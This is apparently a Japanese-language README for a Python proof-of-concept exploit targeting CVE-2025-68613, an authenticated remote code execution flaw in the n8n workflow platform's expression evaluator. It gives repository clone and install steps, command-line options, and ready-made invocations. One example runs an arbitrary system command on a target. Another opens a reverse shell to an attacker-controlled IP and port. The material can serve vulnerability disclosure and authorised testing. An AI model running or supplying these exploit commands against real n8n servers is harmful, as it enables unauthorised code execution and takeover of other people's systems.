
CVE-2025-68613 用の Python エクスプロイト。
n8n ワークフロー自動化プラットフォームにおける重大なリモートコード実行(RCE)脆弱性の概念的実証(PoC)エクスプロイト。
この脆弱性は n8n の式評価システムに存在します。ユーザーが指定した式が適切にサンドボックス化されていないため、認証された攻撃者がホストシステム上で任意のコードを実行できる可能性があります。
CVE ID: CVE-2025-68613
脆弱性の種類: リモートコード実行(RCE)
コンポーネント: 式評価器
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : ターゲットURL(例:http://localhost:5678)-u, --username : n8n アカウントのメールアドレス-p, --password : n8n アカウントのパスワード-c, --cmd : 実行するシステムコマンド--reverse-shell : リバースシェルを起動する(形式:IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444